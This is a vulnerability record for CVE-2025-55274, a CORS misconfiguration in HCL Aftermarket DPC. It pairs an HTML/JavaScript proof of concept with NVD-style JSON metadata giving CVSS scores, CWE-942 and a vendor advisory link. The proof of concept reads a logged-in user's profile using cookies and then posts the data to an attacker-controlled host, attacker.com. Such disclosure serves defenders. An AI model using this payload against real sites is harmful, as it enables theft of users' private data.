CVE-2025-55274

<!-- Proof of Concept: CORS Data Exfiltration --> <html> <body> <script> // Target endpoint of the vulnerable application const targetUrl = 'https://[target-domain]/api/user/profile'; // Function to exploit CORS misconfiguration function exploitCORS() { fetch(targetUrl, { method: 'GET', credentials: 'include' // Send cookies and auth headers }) .then(response => response.text()) .then(data => { // Log or exfiltrate the stolen data console.log('Leaked Data:', data); // Send data to attacker controlled server fetch('https://attacker.com/collect', { method: 'POST', body: JSON.stringify({data: data}) }); }) .catch(err => console.error(err)); } // Trigger the exploit exploitCORS(); </script> </body> </html>

{"cve": {"id": "CVE-2025-55274", "sourceIdentifier": "[email protected]", "published": "2026-03-26T13:16:27.033", "lastModified": "2026-03-26T20:19:07.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by Cross-Origin Resource Sharing vulnerability. CORS misconfigurations includes the exposure of sensitive user information to attackers, unauthorized access to APIs, and possible data manipulation or leakage. If an attacker to exploit CORS misconfiguration, they could steal sensitive data, perform actions on behalf of a legitimate user."}, {"lang": "es", "value": "HCL Aftermarket DPC está afectado por la vulnerabilidad de Cross-Origin Resource Sharing. Las malas configuraciones de CORS incluyen la exposición de información sensible del usuario a atacantes, acceso no autorizado a APIs y posible manipulación o fuga de datos. Si un atacante explotara una mala configuración de CORS, podrían robar datos sensibles, realizar acciones en nombre de un usuario legítimo."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-942"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}